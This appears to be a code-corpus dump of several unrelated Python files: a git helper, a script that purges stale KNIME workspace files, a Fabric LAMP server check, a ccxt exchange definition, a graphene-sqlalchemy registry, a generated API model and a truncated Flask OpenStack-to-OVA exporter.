from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class ClearanceCertificate(Document):
pass
| 23.727273 | 49 | 0.785441 |
acfa6ec261c785f593b18712dbf666c5f9008254 | 1,676 | py | Python | clone/helper/git_operations.py | hashmapinc/hdm | a77872bb7a7d151b2a3f7474b15009cea09aa98f | [
"Apache-2.0"
] | 1 | 2021-02-09T00:40:40.000Z | 2021-02-09T00:40:40.000Z | clone/helper/git_operations.py | hashmapinc/hdm | a77872bb7a7d151b2a3f7474b15009cea09aa98f | [
"Apache-2.0"
] | null | null | null | clone/helper/git_operations.py | hashmapinc/hdm | a77872bb7a7d151b2a3f7474b15009cea09aa98f | [
"Apache-2.0"
] | null | null | null | # Copyright © 2020 Hashmap, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import git
from clone.config.netezza_config import NetezzaConfig
class GitOperations:
def __init__(self, config: NetezzaConfig):
self.target_repo_url = config.git_target_repo_url()
self.local_gitlab_runner_repo = config.git_local_gitlab_runner_repo()
self.repo = ""
def git_clone_target_repo(self):
"""
This method clone a remote target repo to a local repo in Gitlab runner (build agent)
params: target_repo_url, local_gitlab_runner_repo
"""
self.repo = git.Repo.clone_from(self.target_repo_url, self.local_gitlab_runner_repo)
print("Cloning Repo - completed ....")
def git_commit_and_push(self):
"""
This method adds, commits and push changes to remote repo
params: repo
"""
self.repo.git.add('--all')
self.repo.index.commit("committed changes")
origin = self.repo.remote('origin')
origin.push('master')
self.repo.git.add(update=True)
print("Commit and push changes - completed....")
| 38.090909 | 94 | 0.677208 |
acfa706a0c4e4a8aef94ae07b2723daf3c15fab0 | 3,880 | py | Python | wipe_data_knime_users/wipe_data_knime_users.py | clearpeaks-aba/knime-per-user-executor-starter | 6d757d9687f0ce002a6eb4f17708e5fa77737acf | [
"Apache-2.0"
] | 2 | 2020-11-26T07:01:20.000Z | 2020-11-30T16:05:43.000Z | wipe_data_knime_users/wipe_data_knime_users.py | clearpeaks-aba/knime-per-user-executor-starter | 6d757d9687f0ce002a6eb4f17708e5fa77737acf | [
"Apache-2.0"
] | null | null | null | wipe_data_knime_users/wipe_data_knime_users.py | clearpeaks-aba/knime-per-user-executor-starter | 6d757d9687f0ce002a6eb4f17708e5fa77737acf | [
"Apache-2.0"
] | null | null | null | import os
import pwd
import logging
import json
import sys
import getpass
from logging.handlers import TimedRotatingFileHandler
from datetime import datetime
import pathlib
# Checks configuration file is provided
if len(sys.argv) != 2:
print('ERROR: Provide configuration file. Usage:')
print(' ./wipe_data_knime_users.py [JSON configuration file]')
sys.exit()
# Parses configuration file
try:
settings = json.loads(open(sys.argv[1]).read())
except Exception as ex:
print('ERROR: Parsing configuration file: {}'.format(ex))
sys.exit()
# Check script runs with root
if getpass.getuser() != 'root':
print('ERROR: Run this script with root')
sys.exit()
# Loads logging
logger = logging.getLogger("wipe_data_knime_users")
logger.setLevel(getattr(logging, settings['log_level'].upper()))
handler = TimedRotatingFileHandler(settings['log_file'], when=settings['log_rotation_when'], interval=settings['log_rotation_interval'], backupCount=settings['log_rotation_keep'])
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
pathsToWipe = settings['paths']
if isinstance(settings['paths'], str):
pathsToWipe = [settings['paths'], ]
elif not isinstance(settings['paths'], list):
print('ERROR: Parsing configuration file: paths must be a str or a list')
sys.exit()
just_log = settings['just_log']
if not isinstance(just_log, bool):
logger.error('just_log must be boolean')
sys.exit()
delete_days = settings['delete_days']
if not isinstance(delete_days, int):
logger.error('delete_days must be int')
sys.exit()
exceptions_startwith = settings['exceptions_startwith']
if isinstance(settings['exceptions_startwith'], str):
exceptions_startwith = [settings['exceptions_startwith'], ]
elif not isinstance(settings['exceptions_startwith'], list):
print('ERROR: Parsing configuration file: exceptions_startwith must be a str or a list')
sys.exit()
users = []
for user in os.listdir(settings["workspaces_dir"]):
if not user.endswith('_temp'):
users.append(user)
if len(users):
logger.info('Users: {}'.format(users))
else:
logger.error('no users found in {}'.format(settings["workspaces_dir"]))
sys.exit()
now = datetime.now()
def wipe_folder(folder):
logger.debug('Checking folder {}'.format(folder))
elements = os.listdir(folder)
for element in elements:
elementAbsPath = os.path.abspath(os.path.join(folder, element))
ignoreElement = False
for exception_startwith in exceptions_startwith:
if element.startswith(exception_startwith):
ignoreElement = True
logger.debug('Ignoring {}'.format(elementAbsPath))
if not ignoreElement:
if os.path.isfile(elementAbsPath):
fname = pathlib.Path(elementAbsPath)
fowner = pwd.getpwuid(os.stat(elementAbsPath).st_uid).pw_name
mtime = datetime.fromtimestamp(fname.stat().st_mtime)
tdiff=now-mtime
if fowner in users and tdiff.days > delete_days:
logger.info("Deleting {} (now-mtime={}days)".format(elementAbsPath,tdiff.days))
if not just_log:
os.remove(elementAbsPath)
elif os.path.isdir(elementAbsPath):
wipe_folder(elementAbsPath)
for pathToWipe in pathsToWipe:
if not os.path.exists(pathToWipe):
logger.warn('{} does not exist. Ignoring folder.'.format(pathToWipe))
elif os.path.isfile(pathToWipe):
logger.warn('{} is a file. Ignoring file.'.format(pathToWipe))
else:
# It is a folder that exists
wipe_folder(pathToWipe) | 37.307692 | 180 | 0.665206 |
acfa7187d96493909c69622875c93ad37396c5d4 | 2,674 | py | Python | pyalgo/__init__.py | gilad-dotan/pyalgo_pkg | 132ff3c032c3fc0ae910201611e5d2cde387eb74 | [
"MIT"
] | 1 | 2021-04-01T08:59:30.000Z | 2021-04-01T08:59:30.000Z | pyalgo/__init__.py | gilad-dotan/pyalgo_pkg | 132ff3c032c3fc0ae910201611e5d2cde387eb74 | [
"MIT"
] | null | null | null | pyalgo/__init__.py | gilad-dotan/pyalgo_pkg | 132ff3c032c3fc0ae910201611e5d2cde387eb74 | [
"MIT"
] | null | null | null | print("...DONE...")
# python -m pip install --user --upgrade setuptools wheel
# python -m pip install --user --upgrade twine
# python setup.py sdist bdist_wheel
# python -m twine upload --repository testpypi dist/* <-- upload to test Pypi
# python -m twine upload dist/* <-- upload to Pypi
#You can use
#[Github-flavored Markdown](https://guides.github.com/features/mastering-markdown/)
#to write your content with the markdown protocol.
# // Mission Log \\
#
# algocryption.pipeline --> add "save_key" and "load_key"
#
# algocryption --> add to "simple columnar transposition" the option to have a 'chunk_size' as a list
#
#
# algocryption --> add "MD5"
# algocryption --> add "RC4"
# algocryption --> add "RC5"
# algocryption --> add "RC6"
# algocryption --> add "DES"
# algocryption --> add "IDEA"
# algocryption --> add "HMAC"
# algocryption --> add "Rijndael"
# algocryption --> add "TripleDES"
# algocryption --> add "fence gate"
# algocryption --> add "Caesar cipher"
# algocryption --> add "sha algorithms"
# algocryption --> add "Vigenere Cipher"
# algocryption --> add "Playfair Cipher"
# algocryption --> add "monoalphabetic cipher"
# algocryption --> add "MD5 encryption algorithm"
# algocryption --> add "IDEA encryption algorithm"
# algocryption --> add "HMAC encryption algorithm"
# algocryption --> add "shamir secret sharing scheme"
# algocryption --> add "Cryptographic hash functions"
# algocryption --> add "Twofish encryption algorithm"
# algocryption --> add "Blowfish encryption algorithm"
# algocryption --> add "Advanced Encryption Standard (AES)"
# algocryption --> add "ECC Asymmetric Encryption Algorithm"
# algocryption --> add "Elliptic Curve Digital Signature Algorithm" (ECDSA)
#
# pytrainer --> ML_functions // add lambda to Normal_Equation
# pytrainer --> ML_functions // complete Cost_function_Grad -> linear regression \\
# pytrainer --> ML_functions // complete Cost_function -> logistic regression \\
# pytrainer --> ML_functions // complete Cost_function_Grad -> logistic regression \\
#
# pytrainer --> ML_functions // complete gradient_descent \\
# pytrainer --> ML_functions_Training // complete forward_propagation \\ (add forward propagation to neural network)
#
#
# sortalgo --> try to optimize "quick sort"
# sortalgo --> try to use recursion in "quick sort"
#
#
# basic_modules --> in "default_functions" try to optimize "to_single_list", maybe with regression
# basic_modules --> in "default_functions" try to use regression
# basic_modules --> in "default_functions" fix "_8chunk_to_7chunk" and "_8chunk_to_7chunk" to include the flag bites
| 37.661972 | 117 | 0.704188 |
acfa71983ab6a993166921696d573c92cd7ae639 | 2,173 | py | Python | HackerRank/Interview Preparation Kit/Miscellaneous/MaximumXOR.py | Anni1123/competitive-programming | bfcc72ff3379d09dee22f30f71751a32c0cc511b | [
"MIT"
] | 1 | 2021-04-03T13:33:00.000Z | 2021-04-03T13:33:00.000Z | HackerRank/Interview Preparation Kit/Miscellaneous/MaximumXOR.py | iamsuryakant/competitive-programming | 413000f5bc4a627407e1335c35dcdbee516e8cc1 | [
"MIT"
] | null | null | null | HackerRank/Interview Preparation Kit/Miscellaneous/MaximumXOR.py | iamsuryakant/competitive-programming | 413000f5bc4a627407e1335c35dcdbee516e8cc1 | [
"MIT"
] | 2 | 2021-01-23T14:35:48.000Z | 2021-03-15T05:04:24.000Z | #!/bin/python3
import math
import os
import random
import re
import sys
def to_binary_str(number):
return bin(number)[2:]
def build_trie(numbers_array, max_len):
trie = {}
for number in numbers_array:
trie_pos = trie
binary_number = to_binary_str(number)
# pad the string with 0's to be the size of the largest number
# this way we don't have to deal with leftover bits from the query
# or the number.
padded_number = binary_number.zfill(max_len)
for bit in padded_number:
if not bit in trie_pos:
trie_pos[bit] = {}
trie_pos = trie_pos[bit]
return trie
def maxXor(arr, queries):
# get the largest number so we can extra it's length
# take into account the query and the numbers.
max_number = max(arr + queries)
max_number_bin = to_binary_str(max_number)
max_number_len = len(max_number_bin)
opposites = {'0': '1', '1':'0'}
max_xors = []
trie_max = build_trie(arr, max_number_len)
for query in queries:
binary_query = to_binary_str(query)
padded_query = binary_query.zfill(max_number_len)
trie_position = trie_max
xor_string = ''
for query_bit in padded_query:
opposite = opposites[query_bit]
if opposite in trie_position:
xor_string += '1'
trie_position = trie_position[opposite]
elif query_bit in trie_position:
xor_string += '0'
trie_position = trie_position[query_bit]
integer_max = int(xor_string, 2)
max_xors.append(integer_max)
return max_xors
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
arr = list(map(int, input().rstrip().split()))
m = int(input())
queries = []
for _ in range(m):
queries_item = int(input())
queries.append(queries_item)
result = maxXor(arr, queries)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
| 26.5 | 75 | 0.586286 |
acfa71b0cb4246f7c7fb1a3220bf7670f7056dcb | 2,437 | py | Python | test/fabric/lamp.py | dannylujan/lamp | 785ae9777102f72fb0027216483e21fdf81f524e | [
"Apache-2.0"
] | 2 | 2017-02-17T20:35:09.000Z | 2019-02-06T04:50:38.000Z | test/fabric/lamp.py | dannylujan/lamp | 785ae9777102f72fb0027216483e21fdf81f524e | [
"Apache-2.0"
] | 1 | 2017-03-15T19:53:15.000Z | 2017-03-15T19:53:15.000Z | test/fabric/lamp.py | dannylujan/lamp | 785ae9777102f72fb0027216483e21fdf81f524e | [
"Apache-2.0"
] | 6 | 2017-01-19T18:33:19.000Z | 2019-10-07T12:34:05.000Z | from fabric.api import env, hide, run, task
from envassert import detect, file, package, port, process, service
from hot.utils.test import get_artifacts
def phpmyadmin_is_responding():
assert file.exists('/root/.phpmyadminpass'), ("/root/.phpmyadminpass" +
" not found")
credentials = ''
with hide('running', 'stdout'):
credentials = run("cat /root/.phpmyadminpass")
htuser = credentials.split(' ')[0]
htpass = credentials.split(' ')[1]
with hide('running', 'stdout'):
phpmyadmin = run("curl -IL http://localhost/phpmyadmin -u '" +
htuser + ":" + htpass + "'")
return True
def holland_is_running():
with hide('running', 'stdout'):
holland = run("holland bk")
return True
def apache_is_responding():
with hide('running', 'stdout'):
homepage = run("wget --quiet --output-document - http://localhost/")
return True
@task
def check():
env.platform_family = detect.detect()
if env.platform_family == "rhel":
assert package.installed("httpd"), "httpd not installed"
assert package.installed("holland"), "holland is not installed"
assert package.installed("mysql55"), "mysql55 is not insalled"
assert process.is_up("httpd"), "process httpd not running"
assert service.is_enabled("httpd"), "httpd not enabled"
# welcome.conf causes a 403 when running apache_is_responding()
# with the stock build.
if env.platform_family == "debian":
print "Ubuntu 12.04/14.04 or Debian 7.x/8.x"
assert package.installed("apache2"), "apache2 is not installed"
assert package.installed("mysql-server-5.5"), ("mysql-server-5.5 not" +
" installed")
assert process.is_up("apache2"), "apache2 is not running"
assert service.is_enabled("apache2"), "apache2 is not enabled"
assert apache_is_responding(), "apache2 is not responding"
assert port.is_listening(80), "port 80 not listening"
assert port.is_listening(443), "port 443 not listening"
assert port.is_listening(3306), "port 3306 not listening"
assert phpmyadmin_is_responding(), "phpmyadmin is not responding"
assert holland_is_running(), "holland cannot run"
@task
def artifacts():
env.platform_family = detect.detect()
get_artifacts()
| 37.492308 | 79 | 0.631924 |
acfa7240b8f1a5303075768b5086a1790632df29 | 3,440 | py | Python | python/ccxt/async/hadax.py | MoreChickenDelivered/ccxt | a8996798d08a1cedc30bfb3db72d14bc8919930f | [
"MIT"
] | 1 | 2018-07-06T08:14:13.000Z | 2018-07-06T08:14:13.000Z | python/ccxt/async/hadax.py | MoreChickenDelivered/ccxt | a8996798d08a1cedc30bfb3db72d14bc8919930f | [
"MIT"
] | null | null | null | python/ccxt/async/hadax.py | MoreChickenDelivered/ccxt | a8996798d08a1cedc30bfb3db72d14bc8919930f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async.huobipro import huobipro
from ccxt.base.errors import PermissionDenied
class hadax (huobipro):
def describe(self):
return self.deep_extend(super(hadax, self).describe(), {
'id': 'hadax',
'name': 'HADAX',
'countries': ['CN'],
'hostname': 'api.hadax.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/38059952-4756c49e-32f1-11e8-90b9-45c1eccba9cd.jpg',
'api': 'https://api.hadax.com',
'www': 'https://www.hadax.com',
'doc': 'https://github.com/huobiapi/API_Docs/wiki',
},
'has': {
'fetchCurrencies': False,
},
'api': {
'public': {
'get': [
'hadax/common/symbols', # 查询系统支持的所有交易对
'hadax/common/currencys', # 查询系统支持的所有币种
'common/timestamp', # 查询系统当前时间
'hadax/settings/currencys', # ?language=en-US
],
},
'private': {
'get': [
'account/accounts', # 查询当前用户的所有账户(即account-id)
'hadax/account/accounts/{id}/balance', # 查询指定账户的余额
'order/orders/{id}', # 查询某个订单详情
'order/orders/{id}/matchresults', # 查询某个订单的成交明细
'order/orders', # 查询当前委托、历史委托
'order/matchresults', # 查询当前成交、历史成交
'dw/withdraw-virtual/addresses', # 查询虚拟币提现地址
'dw/deposit-virtual/addresses',
'query/deposit-withdraw',
'margin/loan-orders', # 借贷订单
'margin/accounts/balance', # 借贷账户详情
],
'post': [
'hadax/order/orders/place', # 创建并执行一个新订单(一步下单, 推荐使用)
'order/orders', # 创建一个新的订单请求 (仅创建订单,不执行下单)
'order/orders/{id}/place', # 执行一个订单 (仅执行已创建的订单)
'order/orders/{id}/submitcancel', # 申请撤销一个订单请求
'order/orders/batchcancel', # 批量撤销订单
'dw/balance/transfer', # 资产划转
'dw/withdraw/api/create', # 申请提现虚拟币
'dw/withdraw-virtual/create', # 申请提现虚拟币
'dw/withdraw-virtual/{id}/place', # 确认申请虚拟币提现
'dw/withdraw-virtual/{id}/cancel', # 申请取消提现虚拟币
'dw/transfer-in/margin', # 现货账户划入至借贷账户
'dw/transfer-out/margin', # 借贷账户划出至现货账户
'margin/orders', # 申请借贷
'margin/orders/{id}/repay', # 归还借贷
],
},
},
'exceptions': {
'not-allow-entry-hadax': PermissionDenied,
},
'options': {
'fetchMarketsMethod': 'publicGetHadaxCommonSymbols',
'fetchBalanceMethod': 'privateGetHadaxAccountAccountsIdBalance',
'createOrderMethod': 'privatePostHadaxOrderOrdersPlace',
},
})
| 44.675325 | 126 | 0.459012 |
acfa72ff94a3ffc0b24ca577a7f3c0f00d8e1487 | 112 | py | Python | nomadgram2/notifications/apps.py | choiyeonseok/Instagram-cloning | 38dac1d0c717136eaf350ff908b248fb06b8b3dd | [
"MIT"
] | 1 | 2020-07-27T19:56:24.000Z | 2020-07-27T19:56:24.000Z | nomadgram2/notifications/apps.py | choiyeonseok/Instagram-cloning | 38dac1d0c717136eaf350ff908b248fb06b8b3dd | [
"MIT"
] | 28 | 2019-07-03T20:44:58.000Z | 2022-03-15T19:35:20.000Z | nomadgram2/notifications/apps.py | vanadis0929/nomadgram2 | 4a6aa88848bec25ee41a5afa9be4d7f6af515dc4 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class NotificationsConfig(AppConfig):
name = 'nomadgram2.notifications'
| 18.666667 | 37 | 0.794643 |
acfa73258ff062170fb75d1b9111e44f8a07c0bd | 1,450 | py | Python | suspect/monotonicity/rules/abs.py | michaelbynum/suspect | efbfbc4a004d8e167fd4a7247b465b6569818433 | [
"Apache-2.0"
] | null | null | null | suspect/monotonicity/rules/abs.py | michaelbynum/suspect | efbfbc4a004d8e167fd4a7247b465b6569818433 | [
"Apache-2.0"
] | null | null | null | suspect/monotonicity/rules/abs.py | michaelbynum/suspect | efbfbc4a004d8e167fd4a7247b465b6569818433 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Francesco Ceccon
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Monotonicity detection rules for abs function."""
from suspect.monotonicity.monotonicity import Monotonicity
from suspect.monotonicity.rules.rule import MonotonicityRule
from suspect.expression import UnaryFunctionType
class AbsRule(MonotonicityRule):
"""Return monotonicity of abs."""
def apply(self, expr, monotonicity, bounds):
child = expr.args[0]
mono = monotonicity[child]
child_bounds = bounds[child]
if mono.is_constant():
return mono
# good examples to understand the behaviour of abs are abs(-x) and
# abs(1/x)
if child_bounds.is_nonnegative():
# abs(x), x > 0 is the same as x
return mono
elif child_bounds.is_nonpositive():
# abs(x), x < 0 is the opposite of x
return mono.negate()
return Monotonicity.Unknown
| 36.25 | 74 | 0.696552 |
acfa744b5abbd306ffec83e866f533d50e1e8d81 | 3,562 | py | Python | graphene_sqlalchemy/registry.py | oneome-llc/graphene-sqlalchemy | 57cd7866848d5a6ad174710be2a09c1339c159e8 | [
"MIT"
] | 947 | 2016-09-18T03:31:41.000Z | 2022-03-28T11:02:29.000Z | graphene_sqlalchemy/registry.py | oneome-llc/graphene-sqlalchemy | 57cd7866848d5a6ad174710be2a09c1339c159e8 | [
"MIT"
] | 328 | 2016-09-19T13:37:39.000Z | 2022-03-31T20:06:03.000Z | graphene_sqlalchemy/registry.py | oneome-llc/graphene-sqlalchemy | 57cd7866848d5a6ad174710be2a09c1339c159e8 | [
"MIT"
] | 261 | 2016-09-18T10:31:11.000Z | 2022-03-10T18:03:21.000Z | from collections import defaultdict
from sqlalchemy.types import Enum as SQLAlchemyEnumType
from graphene import Enum
class Registry(object):
def __init__(self):
self._registry = {}
self._registry_models = {}
self._registry_orm_fields = defaultdict(dict)
self._registry_composites = {}
self._registry_enums = {}
self._registry_sort_enums = {}
def register(self, obj_type):
from .types import SQLAlchemyObjectType
if not isinstance(obj_type, type) or not issubclass(
obj_type, SQLAlchemyObjectType
):
raise TypeError(
"Expected SQLAlchemyObjectType, but got: {!r}".format(obj_type)
)
assert obj_type._meta.registry == self, "Registry for a Model have to match."
# assert self.get_type_for_model(cls._meta.model) in [None, cls], (
# 'SQLAlchemy model "{}" already associated with '
# 'another type "{}".'
# ).format(cls._meta.model, self._registry[cls._meta.model])
self._registry[obj_type._meta.model] = obj_type
def get_type_for_model(self, model):
return self._registry.get(model)
def register_orm_field(self, obj_type, field_name, orm_field):
from .types import SQLAlchemyObjectType
if not isinstance(obj_type, type) or not issubclass(
obj_type, SQLAlchemyObjectType
):
raise TypeError(
"Expected SQLAlchemyObjectType, but got: {!r}".format(obj_type)
)
if not field_name or not isinstance(field_name, str):
raise TypeError("Expected a field name, but got: {!r}".format(field_name))
self._registry_orm_fields[obj_type][field_name] = orm_field
def get_orm_field_for_graphene_field(self, obj_type, field_name):
return self._registry_orm_fields.get(obj_type, {}).get(field_name)
def register_composite_converter(self, composite, converter):
self._registry_composites[composite] = converter
def get_converter_for_composite(self, composite):
return self._registry_composites.get(composite)
def register_enum(self, sa_enum, graphene_enum):
if not isinstance(sa_enum, SQLAlchemyEnumType):
raise TypeError(
"Expected SQLAlchemyEnumType, but got: {!r}".format(sa_enum)
)
if not isinstance(graphene_enum, type(Enum)):
raise TypeError(
"Expected Graphene Enum, but got: {!r}".format(graphene_enum)
)
self._registry_enums[sa_enum] = graphene_enum
def get_graphene_enum_for_sa_enum(self, sa_enum):
return self._registry_enums.get(sa_enum)
def register_sort_enum(self, obj_type, sort_enum):
from .types import SQLAlchemyObjectType
if not isinstance(obj_type, type) or not issubclass(
obj_type, SQLAlchemyObjectType
):
raise TypeError(
"Expected SQLAlchemyObjectType, but got: {!r}".format(obj_type)
)
if not isinstance(sort_enum, type(Enum)):
raise TypeError("Expected Graphene Enum, but got: {!r}".format(sort_enum))
self._registry_sort_enums[obj_type] = sort_enum
def get_sort_enum_for_object_type(self, obj_type):
return self._registry_sort_enums.get(obj_type)
registry = None
def get_global_registry():
global registry
if not registry:
registry = Registry()
return registry
def reset_global_registry():
global registry
registry = None
| 34.582524 | 86 | 0.657496 |
acfa74746483ce0eb678f78f16fc02dabfd7ca6d | 7,624 | py | Python | out/production/mitmproxynew/clients/python/BrowserUpProxyClient/model/entry_request_cookies.py | 580/mitmproxy | 4cd9ca187918c99db1022b062e57d14ca5153f8b | [
"MIT"
] | 9 | 2021-12-19T13:47:10.000Z | 2022-03-26T06:34:02.000Z | out/production/mitmproxynew/clients/python/BrowserUpProxyClient/model/entry_request_cookies.py | 580/mitmproxy | 4cd9ca187918c99db1022b062e57d14ca5153f8b | [
"MIT"
] | null | null | null | out/production/mitmproxynew/clients/python/BrowserUpProxyClient/model/entry_request_cookies.py | 580/mitmproxy | 4cd9ca187918c99db1022b062e57d14ca5153f8b | [
"MIT"
] | 3 | 2021-12-20T08:21:47.000Z | 2022-03-29T17:55:12.000Z | """
BrowserUp Proxy
___ This is the REST API for controlling the BrowserUp Proxy. The BrowserUp Proxy is a swiss army knife for automated testing that captures HTTP traffic in HAR files. It is also useful for Selenium/Cypress tests. ___ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from BrowserUpProxyClient.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
class EntryRequestCookies(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'name': (str,), # noqa: E501
'value': (str,), # noqa: E501
'path': (str,), # noqa: E501
'domain': (str,), # noqa: E501
'expires': (str,), # noqa: E501
'http_only': (bool,), # noqa: E501
'secure': (bool,), # noqa: E501
'comment': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'name': 'name', # noqa: E501
'value': 'value', # noqa: E501
'path': 'path', # noqa: E501
'domain': 'domain', # noqa: E501
'expires': 'expires', # noqa: E501
'http_only': 'httpOnly', # noqa: E501
'secure': 'secure', # noqa: E501
'comment': 'comment', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, name, value, *args, **kwargs): # noqa: E501
"""EntryRequestCookies - a model defined in OpenAPI
Args:
name (str):
value (str):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
path (str): [optional] # noqa: E501
domain (str): [optional] # noqa: E501
expires (str): [optional] # noqa: E501
http_only (bool): [optional] # noqa: E501
secure (bool): [optional] # noqa: E501
comment (str): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.name = name
self.value = value
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
| 39.708333 | 236 | 0.569911 |
acfa752f74ed81faaa821ca091fd0034b0fa5962 | 4,458 | py | Python | app/modules/generate.py | icclab/openstack-ova-onboarding | 443a789875acc012616bf53eeca2ce01db8ad85d | [
"Apache-2.0"
] | 8 | 2016-09-06T17:47:24.000Z | 2021-03-09T15:07:23.000Z | app/modules/generate.py | icclab/openstack-ova-onboarding | 443a789875acc012616bf53eeca2ce01db8ad85d | [
"Apache-2.0"
] | 1 | 2020-04-16T01:11:25.000Z | 2020-04-16T01:11:25.000Z | app/modules/generate.py | icclab/openstack-ova-onboarding | 443a789875acc012616bf53eeca2ce01db8ad85d | [
"Apache-2.0"
] | 3 | 2017-07-20T11:26:56.000Z | 2019-05-05T11:25:41.000Z | import uuid
import tarfile
import subprocess
from app.modules.openstack.glance import GlanceClient
from app.modules.openstack.nova import NovaClient
from app.modules.xml_file.generate.generation import OVAFile
from flask import Blueprint, request
from openstack.session import get_valid_session
from backend_logging import LOG
import time
import sys
import os
mod = Blueprint('generating', __name__)
from app import app
temp_location = app.config['UPLOAD_FOLDER']
def make_tarfile(source_dir, order):
with tarfile.open(source_dir + ".ova", "w") as tar:
for point in order:
ovf_path = source_dir + "/" + point
tar.add(ovf_path, arcname=os.path.basename(ovf_path))
os.remove(ovf_path)
@mod.route('/api/generate', methods=['POST'])
def generate():
openstack = request.form
region = openstack['region']
session = get_valid_session(openstack)
nova = NovaClient(session=session.session, version=2, region=region)
glance = GlanceClient(session=session.session, version=2, region=region)
if nova.get_status() and glance.get_status():
LOG.info("Connection to all services are established")
ovf_version = "2.0"
my_file = OVAFile(ovf_version)
my_file.base_setUP()
output_folder = str(uuid.uuid4())
os.mkdir(temp_location + output_folder)
ova_path = temp_location + output_folder
def wait_until_image(image_id, period=0.25):
while glance.get_image(image_id)["status"] != "active":
time.sleep(period)
return True
def save_image(image_id, path):
"""Save an image to the specified path.
:param image_id: image id
:param path: path to save the image to
"""
wait_until_image(image_id)
LOG.info("Image is saved as snapshot")
data = glance.get_image_data(image_id)
if path is None:
image = getattr(sys.stdout, 'buffer',
sys.stdout)
else:
image = open(path, 'wb')
try:
for chunk in data:
image.write(chunk)
finally:
if path is not None:
image.close()
number = 1
order_list = ['ova']
for instance_id in (dict(openstack))['instance_id']:
nova_instance = nova.get_instance_by_id(instance_id)
unique_ind = str(uuid.uuid4())
name = nova_instance.name + unique_ind
flavor = nova.get_flavor(id=nova_instance.flavor['id'])
file_reference = "file" + str(number)
image_name = name + '.vmdk'
machine_name = nova_instance.name
disk_capacity = str(flavor.disk*1024*1024*1024)
diskId = "vmdisk" + str(number)
box_id = str(uuid.uuid4())
